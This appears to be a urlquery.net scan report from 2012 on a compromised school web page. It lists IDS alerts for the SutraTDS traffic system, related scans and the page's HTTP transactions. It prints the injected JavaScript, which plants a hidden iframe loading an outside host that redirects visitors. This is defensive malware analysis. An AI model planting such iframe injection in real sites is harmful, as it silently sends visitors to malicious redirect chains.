urlquery.net - Free url scanner

Overview

URL	http://lowndesacademy.org/boxtop.html
IP	67.195.61.65
ASN	AS36647 Yahoo
Location	United States
Report completed	2012-11-06 02:28:28 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection Detected SutraTDS URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 02:27:59	urlQuery Client	64.207.157.231	2	ET CURRENT_EVENTS TDS Sutra - request in.cgi
2012-11-06 02:27:59	urlQuery Client	64.207.157.231	2	ET CURRENT_EVENTS TDS Sutra - request in.cgi

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 02:27:58	urlQuery Client	64.207.157.231	1	MALWARE-CNC TDS Sutra - request in.cgi
2012-11-06 02:27:59	urlQuery Client	64.207.157.231	1	MALWARE-CNC TDS Sutra - request in.cgi

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 67.195.61.65

Date	Alerts / IDS	URL	IP
2013-02-17 17:08:17	0 / 1	http://lefsky.com/wp-content/plugins/Freeway-Mist-Gloves/100878/DCLXIII/Eyes/index.ht (...)	67.195.61.65
2013-02-16 11:37:15	1 / 10	http://www.lawofficemac.com/	67.195.61.65
2013-02-16 10:59:59	0 / 1	http://www.lefsky.com//wp-content/plugins/Freeway-Mist-Gloves/100878/DCLXIII/Eyes/ind (...)	67.195.61.65
2013-02-16 10:51:02	0 / 2	http://lefsky.com/wp-content/plugins/Freeway-Mist-Gloves/100878/DCLXIII/Eyes/	67.195.61.65
2013-02-15 21:27:44	1 / 11	http://xudesigns.com/blog/index.php/category/latest-design/feed/	67.195.61.65
2013-02-15 21:03:44	0 / 11	http://btbh.org/blog/?p=575	67.195.61.65

Last 6 reports on ASN: AS36647 Yahoo

Date	Alerts / IDS	URL	IP
2013-02-17 17:08:17	0 / 1	http://lefsky.com/wp-content/plugins/Freeway-Mist-Gloves/100878/DCLXIII/Eyes/index.html	67.195.61.65
2013-02-17 10:25:43	0 / 0	http://206.190.36.45	206.190.36.45
2013-02-17 07:22:35	0 / 0	http://colacpl_2000@Yahoo.com	206.190.36.45
2013-02-16 17:54:13	0 / 0	http://Terrichavez4@yahoo.com	206.190.36.45
2013-02-16 12:22:36	0 / 0	http://rock834m@yahoo.com	206.190.36.45
2013-02-16 12:15:23	0 / 0	http://GAMEE77@YAHOO.COM	206.190.36.45

Last 3 reports on domain: lowndesacademy.org

Date	Alerts / IDS	URL	IP
2013-01-11 07:41:40	2 / 0	http://lowndesacademy.org/boxtop.html	67.195.61.65
2012-11-16 03:09:57	0 / 2	http://lowndesacademy.org/admin.html	67.195.61.65
2012-11-14 20:14:17	2 / 4	http://lowndesacademy.org/ptoobj.html	67.195.61.65

JavaScript

Executed Scripts (21)

Executed Evals (1)

#1 JavaScript::Eval (size: 571, repeated: 2) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://co-stats.co.be/statistic.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://co-stats.co.be/statistic.htm');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (4)

#1 JavaScript::Write (size: 172, repeated: 1)

<img border="0" style="display:none" src="http://visit.webhosting.yahoo.com/visit.gif?&r=&b=Netscape%205.0%20%28Windows%3B%20en-US%29&s=1176x885&o=Win32&c=24&j=true&v=1.2">

#2 JavaScript::Write (size: 64, repeated: 1)

<img src="/img.php?www5098679f514358.53487159" width=1 height=1>

#3 JavaScript::Write (size: 100, repeated: 1)

<img src="/track.php?uid=www5098679f514358.53487159&d=information.com&sr=1176x885" width=1 height=1>

#4 JavaScript::Write (size: 393, repeated: 1)

<script src="http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi?api=2&callback=_google_json_callback&output=js&adtest=off&client=dp-nameadmin22_3ph_js&channel=000106&hl=en&num_ads=0&num_radlinks=10&optimize_terms=on&categories=off&feed=afs&domain_name=www.information.com&dt=1352165283405&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=1&ref=http%3A%2F%2Fwww.information.com%2F"></script>

HTTP Transactions (44)

Request	Response
GET /boxtop.html HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:49 GMT Set-Cookie: BX=7153s1t89gpsl&b=3&s=9q; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.lowndesacademy.org P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Host: p10w11.geo.gq1.yahoo.com X-INKT-URI: http://www.lowndesacademy.org//boxtop.html X-INKT-SITE: http://www.lowndesacademy.org Last-Modified: Fri, 23 Dec 2011 13:56:51 GMT Accept-Ranges: bytes Content-Length: 25036 Age: 0 Connection: close Server: YTS/1.19.11
GET /css/styles.css HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Sat, 25 Aug 2007 04:36:47 GMT Accept-Ranges: bytes Content-Length: 2011 Age: 0 Connection: close Server: YTS/1.19.11
GET /images/latitle1.gif HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Sat, 25 Aug 2007 04:42:13 GMT Accept-Ranges: bytes Content-Length: 16655 Age: 0 Connection: close Server: YTS/1.19.11
GET /d/lib/smb/js/hosting/cp/js_source/whv2_001.js HTTP/1.1 Host: l.yimg.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: application/javascript Date: Mon, 05 Nov 2012 21:05:07 GMT Cache-Control: max-age=315360000 Expires: Thu, 03 Nov 2022 21:05:07 GMT Last-Modified: Tue, 29 Jan 2008 00:17:28 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Age: 15763 Content-Length: 380 Connection: keep-alive Server: ATS/3.2.0
GET /downloads/sept09boxtop1.jpg HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Wed, 30 Sep 2009 21:13:27 GMT Accept-Ranges: bytes Content-Length: 52874 Age: 0 Connection: close Server: YTS/1.19.11
GET /visit.gif?&r=&b=Netscape%205.0%20%28Windows%3B%20en-US%29&s=1176x885&o=Win32&c=24&j=true&v=1.2 HTTP/1.1 Host: visit.webhosting.yahoo.com GET /visit.gif?&r=&b=Netscape%205.0%20%28Windows%3B%20en-US%29&s=1176x885&o=Win32&c=24&j=true&v=1.2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.0 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:51 GMT Pragma: no-cache Connection: close Cache-Control: max-age=0 Expires: Tue, 06 Nov 2012 01:27:51 GMT Content-Length: 85
GET /images/banner_bg.jpg HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/css/styles.css Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Thu, 06 Aug 2009 14:45:58 GMT Accept-Ranges: bytes Content-Length: 48688 Age: 0 Connection: close Server: YTS/1.19.11
GET /in.cgi?16 HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 836 Connection: close
GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 Host: searchportal.information.com GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 302 Found Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=searchportal5098679f2e1f54.80761407; expires=Thu, 06-Dec-2012 01:27:59 GMT WEBUK=WUK06; path=/ Location: http://www.information.com Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Connection: close
GET /ads.php?message=inactive HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 2710 Connection: close
GET /in.cgi?16 HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 836 Connection: close
GET / HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=www5098679f514358.53487159; expires=Thu, 06-Dec-2012 01:27:59 GMT WEBUK=WUK09; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 580 Connection: close
GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 Host: searchportal.information.com GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16 Cookie: uid=searchportal5098679f2e1f54.80761407; WEBUK=WUK06	HTTP/1.1 302 Found Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=searchportal5098679f2e1f54.80761407; expires=Thu, 06-Dec-2012 01:27:59 GMT Location: http://www.information.com Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Connection: close
GET /?redir=frame&uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com GET /?redir=frame&uid=www5098679f514358.53487159 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/ Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=www5098679f514358.53487159; expires=Thu, 06-Dec-2012 01:27:59 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 520 Connection: close
GET /return_js.php?d=information.com&s=1352165279 HTTP/1.1 Host: return.uk.domainnamesales.com GET /return_js.php?d=information.com&s=1352165279 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 51 Connection: close Set-Cookie: WEBUK=WUK06; path=/
GET /tg.php?uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 270 Connection: close
GET /page.php?www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 159 Connection: close
GET /search.php?uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3800 Connection: close
GET /apps/domainpark/show_afd_ads.js HTTP/1.1 Host: pagead2.googlesyndication.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT Date: Mon, 05 Nov 2012 02:00:17 GMT Expires: Tue, 06 Nov 2012 02:00:17 GMT X-Content-Type-Options: nosniff Content-Disposition: attachment Server: domainserver X-XSS-Protection: 1; mode=block Content-Encoding: gzip Content-Length: 1932 Age: 84463 Cache-Control: public, max-age=86400
GET /track.php?uid=www5098679f514358.53487159&d=information.com&sr=1176x885 HTTP/1.1 Host: www.information.com GET /track.php?uid=www5098679f514358.53487159&d=information.com&sr=1176x885 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/tg.php?uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Content-Length: 43 Connection: close
GET /ajax/libs/jquery/1.5.2/jquery.min.js HTTP/1.1 Host: ajax.googleapis.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Encoding: gzip Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT Date: Thu, 01 Nov 2012 01:09:18 GMT Expires: Fri, 01 Nov 2013 01:09:18 GMT X-Content-Type-Options: nosniff Server: sffe Content-Length: 29947 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 433122
GET /img.php?www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/page.php?www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Content-Length: 43 Connection: close
GET /js/google_lander2.js?20120806 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 06 Nov 2012 01:28:00 GMT Server: Apache/2.2.20 (Ubuntu) Last-Modified: Fri, 02 Nov 2012 19:54:58 GMT Etag: "17001f4-4c09-4cd8882a5e880" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4853 Connection: close
GET /js/jquery.tools.custom.min.js HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:30 GMT Content-Length: 9659 Last-Modified: Fri, 02 Dec 2011 01:21:23 GMT Connection: close Accept-Ranges: bytes
GET /images/rs_center_left_70.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 7602 Last-Modified: Thu, 05 Jan 2012 01:16:56 GMT Connection: close Accept-Ranges: bytes
GET /images/rs_center_right_70.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 7448 Last-Modified: Thu, 05 Jan 2012 01:17:06 GMT Connection: close Accept-Ranges: bytes
GET /landerbanners/in/information.com.jpg HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 17666 Last-Modified: Mon, 11 Jul 2011 07:11:28 GMT Connection: close Accept-Ranges: bytes
